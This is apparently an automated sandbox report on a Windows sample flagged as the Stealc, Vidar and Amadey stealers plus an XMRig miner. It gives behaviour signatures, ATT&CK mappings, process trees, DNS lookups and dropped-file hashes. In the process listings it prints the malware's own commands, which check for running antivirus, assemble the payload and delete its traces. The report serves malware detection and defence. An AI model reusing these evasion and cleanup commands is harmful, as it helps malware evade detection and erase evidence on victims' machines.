Malware Analysis Report

2024-09-11 16:06

Sample ID 240616-nhpxlavgkp
Target 543e80dbd2fa8ddf8cebccc1099b4609.exe
SHA256 52e7510e97f558788067937c97a268ad4951d22f8b94d87855bcb3dd4d6e6708
Tags
stealc vidar discovery spyware stealer amadey xmrig ffb1b9 miner trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

52e7510e97f558788067937c97a268ad4951d22f8b94d87855bcb3dd4d6e6708

Threat Level: Known bad

The file 543e80dbd2fa8ddf8cebccc1099b4609.exe was found to be: Known bad.

Malicious Activity Summary

stealc vidar discovery spyware stealer amadey xmrig ffb1b9 miner trojan upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Stealc

Detect Vidar Stealer

Vidar

xmrig

Amadey

XMRig Miner payload

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Reads data files stored by FTP clients

UPX packed file

Reads user/profile data of local email clients

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates processes with tasklist

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-16 11:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 11:24

Reported

2024-06-16 11:26

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1748 created 1192 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1748 set thread context of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 2252 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 2252 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 2252 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2780 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2780 wrote to memory of 332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2780 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2780 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2780 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2780 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2780 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2780 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2780 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1748 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2220 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2220 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2220 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2220 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2704 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2704 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2704 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe

"C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif" & rd /s /q "C:\ProgramData\AEBGHDBKEBGI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

Network

Country Destination Domain Proto
US 8.8.8.8:53 WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi udp
US 8.8.8.8:53 theemir.xyz udp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 steamcommunity.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5 7f01361524f94ccde5107595e2c54200
SHA1 c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256 903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512 bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5 a7e0c610d9e51e1f07ed50a2698d841c
SHA1 856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256 4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512 60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5 677c8b24ad59b6eef5dfb3faf7e0974a
SHA1 6e52ce41957b616aff5481493c30b7d84090a562
SHA256 b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512 e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5 99f7825b887660ea8f043d913522545b
SHA1 f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256 61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512 ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5 e3b5843f44d2382246054ea8b0706383
SHA1 a3036166a029bb1975129896e091daf40d820999
SHA256 2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512 eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5 a2d24d16e1b5a0972e95b39e1d9a251b
SHA1 a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256 c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512 8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5 5ef48073ad8953dbc25cb95852577d58
SHA1 da11413d729915a120e16e15c47201ad1afd7157
SHA256 30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512 172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5 3876d86dce4359c2e28a693d2c24577f
SHA1 373222b9a4d6f9116feac281725156f024a464fc
SHA256 30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512 9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Then

MD5 33271f00b044ed98071d84807c2158c8
SHA1 392e6351a844de7b50be3486db834321f625b7e1
SHA256 eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512 0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Fx

MD5 dfedbc594137615c08a79052a8f79e4b
SHA1 164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256 7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512 0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5 278bae85379affaab937d9ec59eaa46d
SHA1 badcf501ff87624a68efb1ec3340d6314cc00027
SHA256 ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512 9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5 ae51ee350f9b67d464fef7951cefe7ef
SHA1 109023e02149e2282322d285c00810a1cef0e3de
SHA256 658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512 bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5 4a5d107b42961c4cc01ff0699b64629a
SHA1 6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256 04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512 57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5 fb39a9bcb79f50bd7cd171f3c9325b96
SHA1 922d750974483d7ae4e40d873b1124835d6a865a
SHA256 04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512 fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5 528985f09d3b53a80e38911b2086f45b
SHA1 8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256 79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512 1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5 9aec66d230b5a002f8e58e7c86fd5d11
SHA1 4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256 0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512 752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Lol

MD5 ac4c86188160adc4ea28ea1505dc18bb
SHA1 7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256 8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512 a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Worry

MD5 c715434dab2f93f0d1b6680c2b01b3fc
SHA1 355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256 05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512 7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5 315afae2384177766854966d0c39ead0
SHA1 baa183ea390760a631723c2f1494e0af8fb391e0
SHA256 229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512 384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Fails

MD5 723321b7b3b33a2788e6cc0ba336c76d
SHA1 e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256 db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512 dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5 cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1 a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256 ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512 3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5 47d9d9cdad725675c2dfa55ed4717db6
SHA1 d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256 d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512 4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5 5abe66470ddba2d1adc1ea359fb58b7d
SHA1 b914707d1f1b1c16dc03470cd8737a889292796c
SHA256 fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512 5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5 90ab924a6bc6d90d922308452ce5c128
SHA1 4fd74c170817b9685b9230625fe7e47d54473829
SHA256 2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512 e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5 b8d54a8f7a866ce5950c2c67b18343ee
SHA1 95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256 8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512 1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5 f9c59716c76e0d9aea1ed33432d0c0eb
SHA1 e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256 26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512 c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5 3f96912bd26122377de90bdf2b2adb43
SHA1 355135ae39c67bc1e8a34962db066b2d4862df22
SHA256 1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512 6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5 2c9654e874efe5146131ed5422a715d9
SHA1 0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256 2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512 bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Exception

MD5 2b79f9677d8663ccff67fbe4677a5065
SHA1 f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256 7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512 ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Voice

MD5 c01790f3cef20061f828578069162760
SHA1 72a450b13fd37f6c5c95d94240c51354316d5962
SHA256 328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512 4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5 6d4062e0f673dbe0a06ec227fe515c62
SHA1 c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256 4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512 df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2220-213-0x0000000000570000-0x0000000000CBA000-memory.dmp

memory/2220-214-0x0000000000570000-0x0000000000CBA000-memory.dmp

memory/2220-216-0x0000000000570000-0x0000000000CBA000-memory.dmp

memory/2220-217-0x0000000000570000-0x0000000000CBA000-memory.dmp

memory/2220-219-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2220-218-0x0000000000570000-0x0000000000CBA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 11:24

Reported

2024-06-16 11:26

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

